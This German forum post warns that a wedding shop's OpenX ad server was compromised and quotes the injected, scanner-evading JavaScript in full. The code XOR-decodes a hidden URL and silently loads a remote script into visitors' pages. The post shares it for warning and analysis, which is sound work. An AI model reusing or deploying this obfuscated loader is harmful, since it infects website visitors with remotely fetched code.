Achtung: Weddix.de : Mal wieder ein neuartiger "Javascript-Verschleierer"
Hi,
ich bin neu hier. Warum? Avira hat sein Board zu gemacht
In der Fa. nervt sein ein paar Tagen unser IDS von Symantec wg. eines Browser Exploits.
Ein Wenig Forschung ergab, dass der OpenX Server auf httx://www. weddix. de/hochzeitsshop/hochzeitskarten/shop-hochzeitskarten-einladungskarten-danksagungskarten.html
Gehackt wurde. Leider zum wiederholten Mal. Provider und Betreiber sind leider merkbefreit, trotz mehrfacher Information. Heute sogar per Telefon.
Das Problem: Die Javascript-Verschleierung ist wohl recht kreativ und wird von keinem Scanner erkannt: Code:
var OA_output = new Array();
OA_output['59'] = '';
OA_output['59'] += "<"+"script>var xLGXZkx = \"60d3f856128f68beac15f6f1f9daec7d16f06a73deb934dd155b3d4ed1bf3984f2b9bd96f740dbf4ced41c0206ba0a770e007c3e382631b1101e74592e06736534b8eb675ae1a0be24\";var PJkHGCh = \"08a78c2628a047d8cd76d8949ea39c097f910410b1cd40b27b285527a3cb4aaa91d6d0b99535af80aba6336768ce6f057e72154d5d551ed87d731d3e5c67070c5bd6c40e2a928ed457\";var oSlaGFi = \"\";var w=0x00;for(var i=0;i<"+"(xLGXZkx.length/2);i++){oSlaGFi += String.fromCharCode(parseInt((xLGXZkx[w]+xLGXZkx[w+1]),16)^parseInt((PJkHGCh[w]+PJkHGCh[w+1]),16));w += 2;}var miners = document.getElementsByTagName(\"he\" + \"ad\").item(0);var war = document.createElement(\"sc\" + \"ri\" + \"pt\");war.setAttribute(\"t\" + \"ype\", \"te\" + \"xt/java\" + \"scr\" + \"ipt\");war.setAttribute(\"a\" + \"sync\", \"t\" + \"rue\");war.setAttribute(\"s\" + \"rc\", oSlaGFi);if(document.cookie.indexOf(\"rigid\")==-1){miners.appendChild(war);document.cookie = \"rigid=slowdown; path=/; expires=Thu, 09 Oct 14 22:31:56 +0400;\";}<"+"/script><"+"a href=\'hxxp://adserver.weddix.de/www/delivery/ck.php?oaparams=2__bannerid=175__zoneid=59__OXLCA=1__cb=ec30b2780b__oadest=http%3A%2F%2Fwww.weddix.de%2Fhochzeitsshop%2Fshop-personalisiertes.html\' target=\'_blank\'><"+"img src=\'hxxp://adserver.weddix.de/www/images/163ffdafaed28387897c1783be3aa05a.gif\' width=\'300\' height=\'250\' alt=\'Personalisiertes - das pers�nliche Extra\' title=\'Personalisiertes - das pers�nliche Extra\' border=\'0\' /><"+"/a><"+"div id=\'beacon_ec30b2780b\' style=\'position: absolute; left: 0px; top: 0px; visibility: hidden;\'><"+"img src=\'hxxp://adserver.weddix.de/www/delivery/lg.php?bannerid=175&campaignid=55&zoneid=59&OXLIA=1&loc=http%3A%2F%2Fwww.weddix.de%2Fhochzeitsshop%2F%3F_%24ja%3Dtsid%3A58600%7Ccgn%3A51370668361%7Ckw%3Aweddix%26gclid%3DCK3xw4LVmMECFY_MtAodmicA2g&referer=http%3A%2F%2Fwww.google.de%2Faclk%3Fsa%3Dl%26ai%3DCQMPQXuAyVOy6AuWYzAOk54KoA5n0ursD2Y68w78BvfrFzgIIABABII2WphgoAlDu7Jnp_P____8BYJWKtoLEB6ABpJ7B_wPIAQGqBCFP0EK_zdkXtfNv-SM5z8K7CmhcwYtChMNu9LDUKM0hJ1KABZBOgAfE4T6QBwOoB6a-Gw%26sig%3DAOD64_1Tz4tt39w_mfvD0VKfoNjm3DK0Kg%26rct%3Dj%26q%3D%26ved%3D0CCMQ0Qw%26adurl%3Dhttp%3A%2F%2Ft23.intelliad.de%2Findex.php%253Fredirect%253Dhttp%25253A%25252F%25252Fwww.weddix.de%25252Fhochzeitsshop%25252F%25253F_%252524ja%25253Dtsid%25253A58600%25257Ccgn%25253A51370668361%25257Ckw%25253Aweddix%2526cl%253D5383938303236323131303%2526bm%253D1%2526bmcl%253D4303037313536343737303%2526cp%253D110855761%2526ag%253D11696626081%2526sbm%253D1%2526ad%253D51370668361%2526pl%253D%2526bk%253Dweddix%2526admt%253Dp&cb=ec30b2780b\' width=\'0\' height=\'0\' alt=\'\' style=\'width: 0px; height: 0px;\' /><"+"/div>\n";
Wer mag, kann sich ja mal darum "kümmern" ;)
PS: Die Analyse auf JSUNPACK:
hxxp://jsunpack. jeek. org/?report=d56ba3462d530a0a10b9de62f9766865559a16d1 | 